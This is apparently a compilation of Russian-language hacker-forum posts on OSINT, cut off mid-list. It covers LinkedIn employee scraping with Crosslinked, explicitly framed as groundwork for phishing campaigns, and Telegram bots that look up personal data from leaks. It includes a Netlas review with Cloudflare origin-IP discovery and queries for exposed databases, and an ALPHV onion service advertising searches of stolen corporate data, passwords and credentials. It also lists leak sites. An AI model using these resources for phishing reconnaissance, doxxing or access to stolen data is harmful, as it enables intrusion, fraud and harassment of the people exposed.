Crosslinked использует возможности Python при взаимодействии с интерфейсом LinkedIn для получения данных. Скрипт парсит имена сотрудников, ассоциируемые с определенными компаниями в профилях LinkedIn.
Скрипт очень удобный и универсальный, с простым интерфейсом командной строки, что значительно экономит ваше время, которое могло быть потрачено на утомительные и повторяющиеся задачи для получения необходимой информации.
Автоматизируя процесс сбора данных, Crosslinked позволяет пользователям быстро составить полные списки сотрудников для анализа, расследований или любых других законных (лол) целей использования подобной информации.
Установка
Устанавливаем последний стабильный релиз из PyPi :
Code:Copy to clipboard
pip3 install crosslinked
Либо скачиваем последний релиз из GitHub :
Code:Copy to clipboard
git clone https://github.com/m8sec/crosslinked
cd crosslinked
pip3 install .
Синтаксис
Code:Copy to clipboard
crosslinked <name format> <company>
Формат наименования
Code:Copy to clipboard
{f}.{last} = j.smith
{first.{last} = john.smith
CMP\{first}{l} = CMP\johns
{@company.com">f}{last}@company.com = jsmith@company.com
Пример
Парсинг сотрудников Tesla с электронной почтой @tesla.com
Code:Copy to clipboard
crosslinked -f '{first}.{last}@tesla.com' tesla
Объясняем команду по частям:
Code:Copy to clipboard
cat names.txt
Источник: [https://medium.com/@cuncis/osint-li...-direct-access-using-
crosslinked-62aa5edb35ac](https://medium.com/@cuncis/osint-linkedin-employee-
enumeration-without-api-keys-or-direct-access-using-crosslinked-62aa5edb35ac)
Репозиторий: https://github.com/m8sec/crosslinked
P. S. По мотивам моей сегодняшней беседы с товарищем, с чего начинать подготовку контактов для последующих фишинг-кампаний и дальнейшей работы с таргетами.
Решил собрать кому будет интересно топ ботов которые помогут находить
информацию о людях и компаниях.
*Вывод: Не регистрируйтесь в публичных магазиных, сервисах на свои реальные имена и фамилии. Это позволит сохранить хоть какую то тайну персональных данных.
1. https://t.me/rudetective_bot - Данный бот предоставит все данных о
человеке по телефону, email, инн, снилс и т.д. Достаточно мощный движок.
2. https://t.me/PhoneLeaks_bot - Данный бот покажет как раз с каких
сервисов была слита информация о вас.
3. https://t.me/telesint_bot - Бот показыват все публичные телеграмм
группы в которых участвует человек.
4. https://t.me/AgentFNS_bot - Бот проверяет информацию по контрагентам по
ИНН
5. https://t.me/avtocodbot - Бот который выдаст информацию об авто по ВИН:
дтп, штрафы, места и т.д.
Пользуйтесь и сами будьте аккуратны в использовании реальных своих данных на популярных сервисах.
Источник: <https://telegra.ph/Netlasio---analog-Shodan-Novyj-atlas- Interneta-09-14>
Недавно я решил потестить новый аналог Shodan — сайт Netlas.io. Нашёл его довольно полезным и достойным отдельного обзора. Let's go!
В интерфейс поиска можно попасть только после регистрации и авторизации. Насколько я понимаю, в будущем система поиска не станет открытой, но сейчас стадия альфа-тестирования — поэтому пользоваться ею в текущий момент можно почти без ограничений.
Принцип простой — за каждый полученный результат снимается монета NetlasCoin (изначально их выдаётся 1000). Но в личном кабинете можно нажать кнопку "Renew coins", чтобы вернуть максимальное количество монет.
Надо ли объяснять, почему любая база с результатами скана IPv4 полезна? Как и с утечками, можно найти то, что краулеры одного поисковика упустили, а из другого исключили намеренно.
Поэтому для начала я провёл сравнение Netlas и ещё нескольких аналогичных систем. Цель — понять, как они отличаются по покрытию, функциональности и пригодности для OSINT-ера. Ну и заодно проверить, что полезного можно узнать о чужой сетевой инфраструктуре.
Сперва посмотрим на публичное количество результатов. Конечно, не всегда оно отражает реальную ситуацию, но для погружения в специфику поисковика подойдёт идеально.
К сожалению, единого стандарта для измерения качества результатов подобных сканеров нет. Но это и неудивительно — у кого-то фокус на IoT, у кого-то на веб-сайтах и их безопасности, у кого-то на типовых портах популярного ПО. А теперь представьте, что сканировать необходимо 24/7, и иногда устаревшие уже на сутки данные могут быть неактуальными (сменился IP, закрылся порт, etc.).
Как же тогда оценивать качество базы результатов? Конечно, пройдемся по публично доступной статистике с самих сайтов и соберём что есть:
Пригодные для сравнения цифры я нашёл только в Censys и ZoomEye. Как видите, в результатах нет Shodan: да, он слишком хорош, чтобы публиковать общую статистику. Туда же и другие поисковики, например, BinaryEdge и Fofa.
Архивы сканов вроде Opendata (Sonar) я даже не пытался использовать. Было бы неплохо оценить по ним полноту, но оставлю это любопытствующему читателю. Итак, какие выводы мы можем сделать из полученных данных?
Конечно, общей статистики нам недостаточно. Нужно оценить по более понятным практическим критериям, например, по конкретным поисковым фильтрам.
Разработчики Netlas понимают, что фильтры важны, и сразу предлагают примеры запросов для поиска Mongo, Confluence, Lync/Skype for Bussiness, форумы vBulletin. Что ж, попробуем оттолкнуться от них и поищем для сравнения MongoDB в нескольких системах.
Удивлены тем, что в Shodan отображается меньше всего результатов? На самом деле это вполне объяснимо: самый старый и известный краулер Сети славен чисткой результатов (и наверняка по этой же причине не публикует статистику).
Censys ненамного больше Shodan и Netlas, и это можно расценивать как знак качества — прямо сейчас у исследуемой нами системы уже приличная по размеру база с результатами. С китайскими поисковиками вроде Fofa и ZoomEye отдельный разговор. Почему в них результатов больше в 3-5 раз?
Это можно понять, если внимательно взглянуть на интерфейсе поиска. Там они отображают фильтры по годам и соответствующие доли результатов. Да, вы правильно поняли — в их базах достаточно много старых данных и мертвых хостов. С одной стороны, это может быть полезно в исследовательских целях. С другой стороны, под сомнение попадает и актуальность результатов за текущий год. У самого Netlas пока есть только меню выбора конкретного скана в правом верхнем углу, что уже неплохо. Но мне пришлось постараться, чтобы его найти.)
Разумеется, оценивать качество базы по одной только MongoDB несправедливо, поэтому я прошёлся и по другому ПО. Но мы и так много времени потратили на сравнение, результат будет в конце статьи, а дальше — изучение особенностей. И напоследок скриншот того, как вообще выглядит интерфейс поиска в Netlas:
Как мы уже обсуждали выше, Netlas умеет собирать не только баннеры с сетевых сервисов, но и TLS-сертификаты. Не так давно я готовил материал по методам сбора информации о email. В качестве примера приводил crt.sh, популярную площадку, собирающую информацию из certificate transparency logs о выпуске новых сертификатов. Судя по документации Netlas, они поступают аналогичным образом, а также подтягивают серты, найденные сканированием.
Чем это полезно? При поиске настоящего IP сайта, который находится за Cloudflare, частенько натыкаешься на такой misconfiguration сервера: сертификат отдаётся не только при обращении к сайту по доменному имени, но и по прямому заходу по IP. Разумеется, в результате сканирования по 80/443 портам такой сайт найдётся, и достаточно будет ввести адрес сайта в поисковую строку Netlas, чтобы найти его настоящий IP.
В отличие от Censys, которым я раньше пользовался для таких целей, Netlas также забирает домены из реестра CZDS, так что на странице с результатов вы увидите и ответ закрытого CF-ом сайта, и оригинальный ответ, что очень удобно.
Любопытно, что у Netlas есть отдельные краулеры, собирающие контакты с сайтов, а также есть фильтры для их обратного поиска. Похоже, что эти данные вытаскиваются из футеров страниц, и из них парсятся телефоны, физические адреса, геопозиция и телефоны.
На скриншоте выше приведён пример поиска по контактам и заодно режима статистики. Довольно удобно делать разрезы по нужным параметрам и смотреть в табличном виде, если вас не интересуют сырые ответы.
Согласно документации, информацию по доменам Netlas сгребает отовсюду: начиная CZDS и заканчивая редиректами. Собственно, без этого был бы невозможен удобный поиск хостов по адресу сайта, о чём мы говорили выше.
C whois ситуация попроще — по каждому IP (не по сайту!) есть соответствующий блок с информацией. Контактные данные стандартных полей вырезаны, но иногда всё же можно наткнуться на упоминание email / имени владельца в других полях. Круто было бы видеть там полные персональные данные как на площадках вроде bgp.he.net, но увы, этой информацией в наше время сильно дорожат. И правильно делают.
Возможно, вы уже успели подумать, что неплохо было бы автоматизировать поиск по контактным данным в Netlas. Да, это хорошая возможность, тем более что у них уже есть [документация по API](https://netlas- api.readthedocs.io/en/latest/) и [SDK на Python](https://netlas- python.readthedocs.io/en/latest/).
Я подсуетился и написал для своих целей утилиту поиск по email — netlas- email-search. В качестве источников данных выступают запросы:
Code:Copy to clipboard
# ./netlas-email-search.py root@localhost
Whois search did't return results
SSL search can return 49710 results
Downloading 20 results...
Downloaded first 20 results only. You can get all the results manually with a query <certificate.subject.email_address:root@localhost>
Contacts search can return 6 results
Downloading 6 results...
Webpage search can return 288451 results
Downloading 20 results...
Downloaded first 20 results only. You can get all the results manually with a query <http.body:root@localhost>
Downloaded data was saved to following files:
SSL_root@localhost_results.json
Contacts_root@localhost_results.json
Webpage_root@localhost_results.json
Инструмент выгружает первые 20 результатов и подсказывает, как найти остальное — для быстрого поиска по Netlas подходит идеально.
Возможно, вы успели заметить по скриншоту выше, что для каждого сайта также отображаются идентфиикаторы уязвимостей CVE. Они мапятся по версии ПО в процессе скана и, конечно, требуют дополнительной проверки. Тем не менее, Netlas также услужливо предоставляет ссылки на эксплоиты прямо в результатах.
Подробнее про использование Netlas для поиска уязвимых систем можно прочесть в их статье на Хабре про исследование уязвимых Microsoft Exchange (горячая тема, кстати).
Что ещё есть из интересных фич?
В полку новых сканеров Сети прибыло, и это хорошо. У Netlas есть интересные и многообещающие фичи, а по полноте результатов он может конкурировать с Shodan и почти догоняет Censys.
Уже сейчас можно писать скриптики для API и пользоваться бесконечными лимитами на время альфа-тестирования. И не только в целях OSINT, как мы разобрали выше.
Spoiler: Бонус. Таблица поиска по разным сканерам
Code:Copy to clipboard
---------------------------------------------------------------------
MongoDB
---------------------------------------------------------------------
Netlas | monogdb:* | 73,258
Shodan | product:"MongoDB" | 69,106
Fofa | app="MongoDB-数据库" | 297,561
ZoomEye | app:"MongoDB" | 170,191
Censys | services.mongodb.build_info.version:* | 93,884
BinaryEdge | type:mongodb | 139,247
---------------------------------------------------------------------
Elasticsearch
---------------------------------------------------------------------
Netlas | elasticsearch.elastic_search_main:*. | 35,104
Shodan | product:"Elastic" | 25,214
Fofa | app="elastic-Elasticsearch" | 84,586
ZoomEye | service:"elasticsearch" | 47,503
Censys | services.elasticsearch.system_info.name:* | 31,615
BinaryEdge | type:elasticsearch | 40,750
---------------------------------------------------------------------
PostgreSQL
---------------------------------------------------------------------
Netlas | postgres.is_ssl:* | 598,247
Shodan | product:"PostgreSQL" | 691,759
Fofa | app="PostgreSQL" | 1,194,013
ZoomEye | app:"PostgreSQL DB" | 2,293,650
Censys | services.postgres.protocol_error.code:*. | 794,184
BinaryEdge | product:"PostgreSQL DB" | 818,672
---------------------------------------------------------------------
MySQL
---------------------------------------------------------------------
Netlas | mysql:* | 3,187,586
Shodan | product:"MySQL" | 3,430,794
Fofa | protocol="mysql" | 7,727,585
ZoomEye | app:"MySQL" | 53,123,847
Censys | services.mysql.server_version:* | 2,387,871
BinaryEdge | product:mysql. | 4,339,955
---------------------------------------------------------------------
Redis
---------------------------------------------------------------------
Netlas | redis:*. | 90,769
Shodan | product:"Redis key-value store" | 19,299
Fofa | protocol="redis" | 328,167
ZoomEye | app:"Redis key-value store" | 996,983
Censys | services.redis.os:* | 28,863
BinaryEdge | product:redis | 173,216
Нейросети:
http://labs.tib.eu/geoestimation/ - примерно предполагает местоположение
сделанной фотографии, часто работает вполне точно.
plant.id - опеределяет растительность
🏔 Горы:
peakfinder - интерактивная карта гор, позволяет
вручную ползать по рельефу, сравнивая примерный вид из разных точек.
peakvisor - похожий сервис, выбор остается на
любителя.
peakery - карта пиков
Работа с exif:
exiftool.org - небольшое приложение способное вытащить из изображения все
необходимые нам данные.
exifLooter - примерно тоже
самое, но еще удобно интегрирован в OSM.
fotoforensics - поиск различных артефактов и
следов редактирования фотографий.
🏞 Работа с содержимым изображений:
@DeepPaintBot - улучшение качества изображения.
remini.ai - примерно тоже самое но оставляет вотермарку (если инструмент выше
помрёт)
cleanup.pictures - позволяет стереть содержимое
с картинки для лучшей поисковой выдачи.
remove.bg - убирает фон для поиска конкретного
объекта.
🛰 Агрегаторы спутниковых снимков, бесплатны далеко не все:
Космоснимки.ру - позволяет в большом
количестве искать снимки по датам и конкретной местности.
Maxar - можно выделить нужню область и глянуть
итоговую мозаику.
Геопортал Роскосмоса - филиал батутного министерства
Earth Explorer
Earth on Demand
GloVis
Sentinel-hub
⛈ Интерактивные карты погоды:
Зная дату фотографии вы можете примерно прикинуть в какой области она сделана.
Zoom.Earth - есть интересная опция просмотра пожаров,
которая вроде бы также выявляет артиллерийские расчеты, но я в это сомневаюсь.
Яндекс.погода
- российский сервис погоды, достаточно точно показывает осадки.
http://fotoforensics.com/
🛩 🛳
Корабли и самолеты и поезда одним постом:
Flightaware - коммерческий и малоудобный
сервис, когда Пелоси была над тихим океаном зассали и стерли ее с радаров, но
функционал присутствует.
ADSB-Exchange - мой любимец в этом смысле, очень
удобный сайт, информации может быть меньше, но вполне сойдет.
flightradar24 - все еще самолеты.
Flight Connections - посмотреть какие
маршруты вылетают из аэропорта.
Marine traffic - аналогичный сервис для судов и
кораблей.
Vessel Finder - все еще корабли
Яндекс расписание - можно глянуть расписание
поездов, автобусов, электрички e.t.c.
Андрей Игоревич Масалович
КиберДед знает. Инструкция
по процветанию в
турбулентные времена от
ветерана отечественной
интернет-разведки
Уважаемые форумчане, предлагаем вашему вниманию нашу общую коллекцию утечек с возможностью поиска.
На нашем ресурсе всегда можно побыстрому найти документы(id,dl,ssn), доступы, пароли, конфиденциальную информацию по компании и многое другое!
Информация загруженная в систему добыта нашей командой из реальных сетей и не
является копипастой. Поиск осуществляется как по имени файлов / директорий,
так и по содержимому файла, в т.ч. по изображениям.
Софт может найти текст на изображении, в том числе внутри pdf документа.
Примеры:
Поиск по имени компании
http://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion/search?text="JP
Morgan"
Поиск паролей/доступов
http://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion/search?text=password:
Поиск конфиденциальных доков
http://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion/search?text="non
disclosure agreement"
Все абсолютно бесплатно и предоставляется as is.
В мальтего вроде бы все есть и если надо ещё, то можно добавить.
Если есть ещё какая-то утилита, то поделитесь ей.
А также есть у кого-нибудь maltego max
Привет знает кто софт такой? Если еще можно будет локацию пробить будет идеал))
Бесплатные:
@Info_in_bot - бесплатный поиск по Украине
@pyth1a_0racle_bot - поиск в утечке яндекс еды
@getcontact_real_bot - гетконтакт, банально
@t3_avtootvetchik_bot - чекает тоже отлично
@probivbotbotbot_bot - гетконтакт только получше
@kolibri_osint_bot - чекает по открытым источникам, находит имя в
одноклассниках и имя в вк
@NullSeach_bot - чекает в базах
@oko_freebot - норм по вк и фото, ну и не только. С номером и фио какие-то
баги
Платные:
@protcom_bot - прекрасный бот, ищет в огромном количестве баз, ищет ОК, ВК и
прочую информацию
Для начало нужно понять как деанонимизируют личности.
Например
Потенциальный деаноньщик ущемился и хочет тебе отомстить
Юное дарование хочет узнать о тебе все
Первое что он делает , это составляет твой портрет тоесть
Если у него есть номер то скорее всего он будет искать вк
Чтобы узнать "ФИ" и примерную дату рождения
Потом либо через базы либо черз сторонних ботов по пробиву узнает твою
прописку
И так, как же обезопасить себя от деанона ?
Правила
1)И первая твоя ошибка что ты используешь свои номера будь то киви вк
фэйсбук ~~порнхаб~~
не используй свои номера - покупай номера рублей за 20 и будет тебе
счастье
2)Есть и второй исход, если по номеру юное дарование не смогло тебя найти,
оно попробует найти все аккаунты с похожими логинами, а ты то свой ник noob228
полюбому где то еще регестрировал
так что вторая причина **не использовать одинаковые логины
**3)И третья банальная причина это то что ты используешь свою имя фамилию на
том или ином сайте, будь то: inst, fb, vk итд
**по этому не используй свои "ФИ"
**4)Не ставь на аватарку свое лицо тк через сервисы по типу findclone или
search4faces легко найти твое красивое личико
так что номер четыре не публикуй фото лица
5) Если тебе кидают ссылку и говорят посмотреть, знай это ip логгер чтобы от
этого защитится можно использовать либо vpn сервис либо добавить все сайты
логгеров в файл hosts
он находится в C:/Windows/System32/Drivers/etc/hosts и туда внизу нужно
написать все из текстовика
А на этом можно и закончить следующая статья уже будет о деаноне
1. Инструменты исследования ключевых слов.
- Google AdWords
- Инструмент подсказки ключевых слов
- KWFinder
- Ключевое слово обнаружить
- Ключевое слово
- One Look: введите слово, фразу, предложение или образец для поиска связанных слов.
- Ubersuggest: предлагать ключевые слова, недоступные в Планировщике ключевых слов Google.
2.Браузерные расширения для OSINT.
- [Double Shot Search](https://chrome.google.com/webstore/detail/double- shot-search-query/kddlkbpbepnaepdleclhdnfdpdogdhop) — это расширение для Chrome, которое удваивает поиск. Ищет одновременно в двух поисковых системах — Bing и Google.
- Hunter. io — это сервис, который находит адреса электронной почты, связанные с определенным доменом. Вы также можете использовать этот инструмент, чтобы найти адрес электронной почты по имени за пару секунд.
- [RevEye](https://chrome.google.com/webstore/detail/reveye-reverse-image- sear/keaaclcjhehbbapnphnmpiklalfhelgf) — это расширение для Chrome с открытым исходным кодом, которое запускает фотографии через Google, Bing, Yandex и TinEye.
**3. Поисковые системы.
3.1. Общий поиск.**
3.2.Национальные поисковые системы.
3.3. Поисковые системы, ориентированные на конфиденциальность.
- DuckDuckGo: онлайн-исследователи обычно используют его для поиска в сети с помощью браузера Tor.
- Стартовая страница: получение результатов от Google без отслеживания пользователей.
- Peekier: поисковые системы, ориентированные на конфиденциальность.
- Квант: Базируется во Франции.
- Оскобо: базируется в Великобритании.
- Swisscows: безопасный веб-поиск в Швейцарии.
- Gigablast: поисковая система с открытым исходным кодом.
- Gibiru: анонимная поисковая система без цензуры.
- Привадо
4. Мета поисковые системы.
- Возбуждать
- Поиск
- МетаГер
- Запмета
- etools: собирайте результаты из основных международных поисковых систем..
- Все в Интернете: запрашивайте основные поисковые системы, включая сайты покупок, такие как Amazon и eBay.
- izito: объединение данных из нескольких источников (Yahoo, Bing, Wikipedia, YouTube и других).
- Metacrawler: сводные результаты от Google и Yahoo! .
- Мой весь поиск: объединяет результаты через Bing, DuckDuckGo, AOL Search, Ask, Oscobo, Mojeek, ZapMeta, MetaCrawler.
- Carrot2: Механизм кластеризации результатов поиска с открытым исходным кодом объединяет результаты GoogleAPI, Bing API, eTools Meta Search, Lucene, SOLR и других.
- elocalfinder: получение результатов из Google, Yahoo! , Ask и Bing.
5. FTP-поисковики.
6. Поисковые системы файлов
- Фаганфиндер
- поисковая система документов
- grayhatwarfare: поиск корзин Open Amazon s3 и их содержимого.
7. Системы поиска изображений
Google Bing Yahoo images Yandex images Baidu images
Photobucket smugmug Picsearch creativecommons8. Существуют специализированные сайты, на которых хранятся изображения, появившиеся в прессе и новостных СМИ, для поиска изображений такого типа перейдите по ссылке:
- Gettyimages: содержит изображения из новостей, развлечений, моды, спорта и архивные изображения.
- Фотографии Рейтер
- Новости прессы
- Портал изображений Associated Press
- PA-изображения
- Европейское агентство пресс-фото
- Архив изображений канадской прессы
9. Изображения, размещенные на сайтах социальных сетей, можно найти в следующих местах:
- Flickr
- Мерцающая карта
- idGettr: найти идентификационный номер мерцания (также работает для групп) .
- Flickr Hive Mind: инструмент интеллектуального анализа данных для базы данных фотографий Flickr.
- Инстаграм
- Stalkture: онлайн-просмотрщик Instagram.
- Пинтерест
10. Существуют специализированные сайты, на которых хранятся изображения, появившиеся в прессе и новостных СМИ, для поиска изображений такого типа перейдите по ссылке:
- Обратный поиск Google
- Кармадечай
- оловянный глаз
- Обратный поиск картинок в Яндексе
- Визуальный поиск Bing
- обратный ПОИСК ПО изображению
- аходит приложение: это приложение доступно как для устройств Android, так и для устройств Apple.
- Проект идентификации изображения
- Picsearch.
- поисковая система Яху
11. Поиск графики:
12. Поиск стоковых фотографий:
13. Поисковые системы новостей/газет.
- 1stHeadlines: заголовок последних новостей.
- [Архив новостей Google](https://news.google.com/?hl=en- US&gl=US&ceid=US:en)
- Архив газет Google
- Новости сейчас
- Архивы газет: содержит архивы газет за 1607-2017 гг. , а также некрологи и записи семейной истории.
- Все, что вы можете прочитать
- Газеты Поиск
- [Findmypast](https://search.findmypast.com/search/us-and-world- newspapers): история США и мира (Китай, Дания, Франция, Германия, Ямайка и Южная Африка также доступны для поиска в коллекции) Архив газет.
- Ежедневная Земля
- Справочник газет США с 1690 г. по настоящее время
- Карта газет
- Мировые новости
- Разносчик газет
- Newsography: глобальный агрегатор новостей и историческая база данных о международных отношениях и вооруженных конфликтах.
- Онлайн-газеты: Каталог онлайн-газет для всего мира.
- YouGotTheNews: поисковая система для новостей США. Поиск в тысячах национальных, деловых и местных источников новостей.
- Справочник газет Библиотеки Конгресса и 100 лет назад сегодня: поиск в Справочнике газет США с 1690 г. по настоящее время, используя эти две ссылки из Библиотеки Конгресса.
14. Системы поиска видео.
- YouTube
- гугл видео
- поиск видео Yahoo
- Bing-видео
- Видео AOL
- Поиск видео на стартовой странице
- Вео
- видео
- 360ежедневно
- Официальный поиск видео в Facebook
- Клубок толпы (поиск видео в Facebook)
- Интернет-архив фильмов с открытым исходным кодом
- Живая утечка
- Карта живого видео в Facebook
- Мета Трубка
- [Инструмент геопоиска](http://youtube.github.io/geo-search- tool/search.html): поиск всех фильмов в соответствии с определенным запросом, введенным пользователем.
- Земляная камера
- Инсекам
15. Поиск по блогам.
- Поиск по блогам
- поисковая система по блогам
- блоггингфьюжн
- Каталог блогов
- Блогхаб: Интернет-каталог блогов.
- блог-поиск
- поисковая система по блогам
16. Обнаружение фейковых новостей.
- Snopes: Обнаруживает ложные новости.
- Обман: проверьте распространение ложных утверждений.
- FactCheck: этот сайт сотрудничает с Facebook, чтобы помочь идентифицировать и маркировать фальшивые новости.
- ReviewMeta: анализ отзывов пользователей Amazon.
- Reporter Lab: дает карту глобальных сайтов проверки фактов.
- Правда или вымысел: находите поддельные новости на разные темы, такие как политика, природа, здоровье, космос, преступность, полиция, терроризм и т. д.
- Hoax-Slayer: фокусируется на мошенничестве с электронной почтой.
- Справочник по проверке: подробное руководство по проверке цифрового контента для покрытия в чрезвычайных ситуациях, доступное на разных языках.
- Верификационный наркоман: это каталог инструментов для проверки, проверки фактов и оценки достоверности.
17. Системы патентного поиска.
- Система расширенного поиска патентов Google
- Европейское патентное ведомство
- База данных патентного ведомства Израиля
- Ведомство промышленной собственности Норвегии
- Шведское бюро патентов и регистрации
- Швейцария
- Ведомство интеллектуальной собственности Тайваня
- Патентное ведомство Японии
- Всемирная организация интеллектуальной собственности (ВОИС)
- Государственное ведомство интеллектуальной собственности (SIPO) Китайской Народной Республики
- Патентный поиск Австралии
- Канадское ведомство интеллектуальной собственности
- Датское ведомство по патентам и товарным знакам
- Финское бюро патентов и регистрации
- Патентный поиск во Франции
- Патентное ведомство Германии
- [Патентная поисковая система Великобритании](https://www.gov.uk/search- for-patent)
- Патентное ведомство Индии
- stopfakes: Управление международной торговли (ITA).
- FreePatentsOnline: система поиска метаданных патентов.
- Патентная линза
- Справочник ведомств интеллектуальной собственности по всему миру
**18.Поиск бизнеса.
18.1.Бизнес-профили.**
[![[IMG]](/proxy.php?image=https%3A%2F%2Fleonardo.osnova.io%2Fe0bafcfe- efd6-5032-a87a-3ec143ca64a1%2F-%2Fpreview%2F400%2F-%2Fformat%2Fwebp%2F&hash=e8fbc9728fb83c6a865dc1de552bcc0d)](https://leonardo.osnova.io/e0bafcfe- efd6-5032-a87a-3ec143ca64a1/-/preview/400/-/format/webp/)
- Открытые корпорации: крупнейшая открытая база данных компаний в мире.
- кранчбейс
- Информация Zoom: список компаний в США, классифицированных по отраслям, и предложение информации.
- корпоративная вики: позволяет искать любую компанию и визуализировать связь между людьми, работающими в ней.
- Kompass: это глобальный портал B2B с информацией о компаниях из более чем 60 стран.
- Инфобел
- Каталог Орбис
- Manta: Бизнес-справочник для компаний США
- [Возможности канадской компании](http://strategis.ic.gc.ca/eic/site/ccc- rec.nsf/eng/Home)
- Канадская база данных импортеров
- LittleSis Это мощный профилирующий веб-сайт, на котором содержится огромное количество информации о 185 000 человек и 67 000 организаций.
- Дом компаний
- europages
- Свод
- Сова
- Список компаний с ограниченной ответственностью Соединенного Королевства
- Международные белые и желтые страницы
- гугл финансы
- Подтверждение номера плательщика НДС (ЕВРО)
- Проверка номера EORI
- Судебные дела арбитражных судов (RUS)
- Европейский портал электронного правосудия
18.2. Годовые отчеты бизнеса.
- Годовые отчеты: содержит тысячи годовых отчетов от 5 333 компаний по всему миру.
- Reporter Link: содержит более 60 миллионов доступных для поиска таблиц, рисунков и наборов данных.
- [Правительство Великобритании](https://www.gov.uk/government/publications/overseas- registries/overseas-registries)
- Комиссия по ценным бумагам и биржам США
- Седар
- [Регистрация компании по всему миру](https://www.commercial- register.sg.ch/home/worldwide.html): дайте список сайтов государственных и коммерческих реестров по всему миру.
19. Сайты утечки данных
- Утечка. sx
- средство проверки нарушений
- Интеллект Х
- 4iq
- поиск утечки
- проверка на утечку
- ядерные утечки
- weleakinfo
- утечка информации
- закрыть
- снюсбаза
- Меня продали?
- утечка источника
- Викиликс
- Джо Блэк Секьюрити
- Черный коршун
- разбросанные секреты
- дехешированный
- Криптом
- иноицу
- GlobaLeaks: предназначенное для обеспечения безопасных и анонимных инициатив.
- Следственный отдел Аль- Джазиры
- призрачный проект
- Был ли я зарегистрирован в Facebook? : проверьте, не были ли ваши данные частью взлома Facebook в апреле 2021 года.
- шпионское облако
- рейдфорумы
- Меня убили? : проверьте, включены ли ваши данные в утечку данных Facebook в 2019 году.
- ликхиспано
- [Fasterbroadband](https://www.fasterbroadband.co.uk/tools/data-breach- search)
- [F-Secure Identity Theft Checker](https://www.f-secure.com/en/home/free- tools/identity-theft-checker)
- Firefox Монито р
- Амибдостигнутый
- Проверка пароля Google
Click to expand...
20. Социальные сети.
* [Трекер бренда](https://brandmentions.com/brand-tracker/)
20.1.Фейсбук.
* [Сканер Facebook](https://stalkscan.com/): с 6 июня вы можете
сканировать только свой профиль с помощью этого инструмента. * Socmint: упростите получение информации с помощью поиска Facebook Graph. * Идентификатор поиска: найдите личный числовой идентификатор Facebook / идентификатор группы / идентификатор страницы. * FindMyFbid: Найдите личный числовой идентификатор Facebook. * JSON-поиск в Facebook * LikeAlyzer: Анализ и мониторинг страниц Facebook. * Face Live: поиск живого видео на Facebook. * Кто что выложил? : Генератор поиска ключевых слов Facebook. Он ищет сообщения Facebook и ограничивает результаты определенной датой. * ExtractFace: автоматическое извлечение данных из профилей Facebook (в настоящее время не работает) . 20.2. Твиттер.
* [Главная страница поиска в Твиттере](https://twitter.com/search-home) * [Страница расширенного поиска в Твиттере](https://twitter.com/search-
advanced) * Колода Твиттера * Все мои твиты: просмотр всех общедоступных твитов. * Карта трендов: показывает самые популярные тренды, хэштеги и ключевые слова в Твиттере из любой точки мира. * Foller: Анализ аккаунта Twitter (общедоступная информация профиля, количество твитов и подписчиков, темы, хэштеги, упоминания) . * Первый твит: Найдите первый твит по любому ключевому слову поиска или ссылке. * Социальная направленность: Анализ твиттер-аккаунтов. * Твисси * Последователь * Время сна: предскажите график сна любого человека в Твиттере. * Простой анализатор профиля Twitter (скрипт Python). * Доска тегов: поиск хэштегов в Twitter, Facebook и Google+. * тинфолик * Spoonbill: отслеживайте изменения профилей людей, на которых вы подписаны в Twitter. * Экспорт твита: расширенный аналитический сервис Twitter. 20.3.LinkedIn.
* [Специалист по подбору персонала LinkedIn Xray
Search](https://recruitmentgeek.com/tools/linkedin) * LinkedIn Scraper: очищает любые данные LinkedIn * Tomgandhi Consulting LinkedIn Xray Поиск * Наймите их в рентгеновском поиске * Lisearcher: легко находите общедоступные профили LinkedIn. * [Слесарь для LinkedIn](https://chrome.google.com/webstore/detail/locksmith-for- linkedin/genllfnipblmicelmgkbdofmbgldnhlg) * Средство извлечения контактов LinkedIn * LinkedIn Резюме * Поиск людей в LinkedIn (международный) 20.4.Инстаграм.
* [иконоквадрат](https://pro.iconosquare.com/) * [picodash](https://www.picodash.com/): мощная поисковая система для
просмотра фотографий, видео, пользователей и местоположений в Instagram и Twitter. * ТоФо 20.5.Реддит.
* [reddit-user-analyser. netlify. app](https://reddit-user-
analyser.netlify.app/): Анализ пользователя Reddit. * resavr: Показать удаленные комментарии Reddit * redditsearch: Расширенный поиск Reddit * karmadecay: Обратный поиск изображений на Reddit. com (бета) * Reddit: поисковый детектив Reddit * [В основном безвредно](https://kerrick.github.io/Mostly- Harmless/#features): ищет страницу, которую вы сейчас просматриваете, чтобы узнать, была ли она отправлена на Reddit. * реддиархив * [Reddit Enhancement Suite](https://chrome.google.com/webstore/detail/reddit-enhancement- suite/kbmfpngjjgdllneeigpgjifpgocmfgmb): надстройка для Google Chrome. * Исследователь Reddit: исследуйте пользователей Reddit. * Метрики Reddit: инструмент для отслеживания статистики пользователей Reddit. * atomiks: проанализируйте пользователя Reddit. * SnoopSnoo: получайте информацию о любой активности пользователей Reddit. * Поиск комментариев Reddit: поиск по комментариям определенного пользователя Reddit. 20.6.Психологический анализ социальных сетей.
* [Tone Analyzer](https://tone-analyzer-demo.mybluemix.net/): это
онлайн-сервис, который предлагает бесплатный лингвистический анализ для обнаружения человеческих чувств. * [Watson Tone Analyzer](https://www.ibm.com/watson/services/tone- analyzer/): это облачный сервер, созданный IBM. Он анализирует эмоции и оттенки онлайн-контента. * Поддельный спорт: этот сайт анализирует отзывы пользователей Amazon, Yelp, TripAdvisor и Apple App store, чтобы проверить достоверность этих отзывов. * Мета отзывов: изучите отзывы пользователей на Amazon. 21. Поиск людей.
21.1. Общие поисковые системы людей.* [Искатель правды](https://www.truthfinder.com/): TruthFinder имеет
